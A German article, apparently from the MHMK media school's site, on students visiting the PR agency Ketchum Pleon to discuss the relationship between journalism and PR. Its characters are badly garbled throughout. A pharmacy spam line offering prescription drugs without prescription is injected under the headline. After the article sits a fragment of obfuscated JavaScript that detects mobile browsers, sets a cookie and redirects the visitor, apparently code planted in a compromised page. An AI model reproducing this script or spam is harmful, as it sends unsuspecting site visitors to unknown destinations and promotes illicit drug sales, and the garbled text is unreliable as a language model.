Journalismus oder PR?

MHMK-Studierende zu Gast bei Ketchum Pleon

lasix no prescription overnight, clonidine next day no prescription.

Alexander Bogner und Claudia Geidel von Ketchum Pleon (Foto: HHA)

Ketchum Pleon ist eine der grAi??AYten PR-Agenturen in Deutschland und weltweit vernetzt. FA?r Journalisten also das definitive Feindbild?Ai??Das Gegenteil ist der Fall, wie eine Gruppe MHMK-Studierender herausgefunden hat, die zusammen mit ihren Dozenten Prof. Dr. Hektor HaarkAi??tter und Dr. Jost KA?pper die reprAi??sentative Filiale der Agentur besucht hat.

Mit Senior Creative Consultant Claudia Geidel und PR-Berater Alexander Bogner sprachen die angehenden Journalistinnen A?ber das VerhAi??ltnis von Journalismus und PR. Der oftmals feindseligen AttitA?de steht hAi??ufig ein sehr professionelles wechselseitiges KommunikationsverhAi??ltnis gegenA?ber, bei dem beide Seiten aufeiinander angewiesen sind. ai??zEinen groben Fehler sollte man trotzdem nicht machenai???, verrAi??t Bogner, ai??znAi??mlich in Emails ai??sliebe Kolleginnen und Kollegenai??? zu schreiben. Das mAi??gen Journalisten gar nicht, denn wir sind keine Kollegenai???. Von den Werbetreibenden unterscheiden sich die PR-Leute vor allem dadurch, dass sie sich ausschlieAYlich an Multiplikatoren wenden, und das sind in aller Regel Journalisten, mitunter aber auch Vorstandsvorsitzende oder andere leitende Angestellte. ai??zLieber professionelle Strukturen mit gut informierten PR-Fachleuten, als unprofessionelle AuskA?nfte von Firmenvertreternai???, das kAi??nnte eine Quintessenz auf der Haben-Seite des VerhAi??ltnisses Journalismus und PR sein. Die Studierenden der MHMK interessierten sich aber auch dafA?r, welche JobmAi??glichkeiten es fA?r ausgebildete Journalisten in der PR-Branche gebe. ai??zViele PR-Leute sind von Haus aus Journalistenai???, erklAi??rt Claudia Geidel. Das liege vor allem daran, dass es bis vor kurzem praktisch keine eigenstAi??ndige Ausbildung fA?r PR-Fachleute gegeben habe. ai??zUnd als Unternehmenssprecher nehmen groAYe Firmen heute noch gerne altgediente Journalistenai???, weiAY Alexander Bogner, denn hier wA?rden sich auch die guten Kontakte einer langen Journalistenkarriere bezahlt machen. ai??zJournalismus und PR mA?ssen keine feindlichen BrA?der seinai???, befindet Journalistik-Professor Dr. Hektor HaarkAi??tter, ai??zbeide Seiten kAi??nnen sich das Leben leichter, aber eben auch schwerer machenai???. w)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Facebook Like

Comments are closed.